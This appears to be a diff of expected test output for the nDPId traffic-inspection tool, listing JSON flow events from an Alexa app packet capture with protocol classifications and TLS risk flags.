+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00930{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00943{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00943{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 